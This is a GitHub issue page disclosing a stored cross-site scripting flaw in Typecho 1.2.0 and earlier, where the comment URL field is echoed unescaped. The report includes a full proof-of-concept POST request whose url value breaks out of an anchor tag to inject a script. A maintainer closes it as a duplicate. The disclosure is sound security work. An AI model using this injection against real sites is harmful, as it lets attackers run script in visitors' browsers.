Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Typecho <= 1.2.0 Comments URL with Stored-XSS Vulnerability #1546

Closed
1manity opened this issue Mar 25, 2023 · 1 comment
Closed

Typecho <= 1.2.0 Comments URL with Stored-XSS Vulnerability #1546

1manity opened this issue Mar 25, 2023 · 1 comment

Comments

@1manity
Copy link

1manity commented Mar 25, 2023

Influenced Version
Typecho <= 1.2.0

Description
Typecho comments URL with Stored-XSS vulnerability.
1.Comment on an article in any capacity with xss payload.
2.In Comments /usr/themes/default/comments.php,The url parameter filters only the beginning without any other protection, and directly echoed to html.
3.XSS is triggered when the site is visited again.
image

POC
POST /index.php/archives/1/comment with:

author=1&mail=12%4012&url=http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#&text=1221&_=9d8302e080b9c139354b528787f1e5e4

The full POC request:

POST /index.php/archives/1/comment HTTP/1.1
Host: 127.0.0.1
Content-Length: 143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

author=123&mail=123%40123.com&url=http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#&text=123&_=9d8302e080b9c139354b528787f1e5e4

or type directly into the website below then commit:
image

image

image

image

@joyqi
Copy link
Member

joyqi commented Mar 28, 2023

duplicate to #1545

@joyqi joyqi closed this as completed Mar 28, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants